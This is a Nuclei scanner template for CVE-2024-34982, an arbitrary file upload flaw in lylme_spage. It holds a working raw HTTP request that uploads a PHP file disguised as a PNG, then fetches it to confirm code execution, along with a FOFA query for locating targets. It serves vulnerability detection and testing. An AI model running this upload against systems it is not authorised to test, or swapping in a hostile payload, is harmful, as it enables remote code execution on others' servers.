nuclei-templates/http/cves/2024/CVE-2024-34982.yaml

77 lines
2.1 KiB
YAML

id: CVE-2024-34982
info:
name: LyLme-Spage - Arbitary File Upload
author: DhiyaneshDk
severity: high
description: |
An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file.
reference:
- https://github.com/n2ryx/CVE/blob/main/Lylme_pagev1.9.5.md
- https://github.com/tanjiti/sec_profile
- https://github.com/ATonysan/poc-exp/blob/main/60NavigationPage_CVE-2024-34982_ArbitraryFileUploads.py
metadata:
verified: true
max-request: 1
fofa-query: icon_hash="-282504889"
product: lylme_spage
vendor: lylme
tags: cve,cve2024,lylme-spage,rce,intrusive
classification:
cpe: cpe:2.3:a:lylme:lylme_spage:*:*:*:*:*:*:*:*
flow: http(1) && http(2)
variables:
string: "{{randstr}}"
filename: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST /include/file.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------575673989461736
-----------------------------575673989461736
Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
Content-Type: image/png
<?php echo "{{string}}";unlink(__FILE__);?>
-----------------------------575673989461736--
matchers-condition: and
matchers:
- type: word
words:
- '"code":'
- '"msg":'
- 'php"}'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: path
part: body
group: 1
regex:
- '"url":"([/a-z_0-9.]+)"'
internal: true
- raw:
- |
GET {{path}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "{{string}}" )'
- 'contains(header, "text/html")'
condition: and
# digest: 4a0a004730450220440784f1e1d309bfb1eee99fbcaf02afe7bfa185b48f07233df0f14cac9e9d9b0221009072b53098bb58d0d3efd14db1a3fc5f7b0b4593a0426fa060db0c42edd6f029:922c64590222798bb761d5b6d8e72950